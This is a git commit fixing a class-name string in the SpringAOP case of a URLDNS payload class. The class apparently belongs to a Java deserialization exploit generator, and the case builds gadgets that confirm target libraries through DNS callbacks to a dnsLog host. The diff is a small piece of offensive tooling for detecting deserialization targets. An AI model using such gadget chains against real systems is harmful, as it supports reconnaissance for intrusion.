fix: 修复URLDNS链SpringAOP类错误

This commit is contained in:
qi4L
2025-09-01 10:50:57 +08:00
parent df6e1151a3
commit c723e57d78
2 changed files with 2 additions and 2 deletions
@@ -231,7 +231,7 @@ public class URLDNS implements ObjectPayload<Object> {
break;
case "SpringAOP":
//fastjon/jackson两个链触发toString的变种,都需要springAOP
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource.HotSwappableTargetSource");
Object springAOP = getURLDNSGadget("SpringAOP." + dnsLog, "org.springframework.aop.target.HotSwappableTargetSource");
list.add(springAOP);
break;
case "winlinux":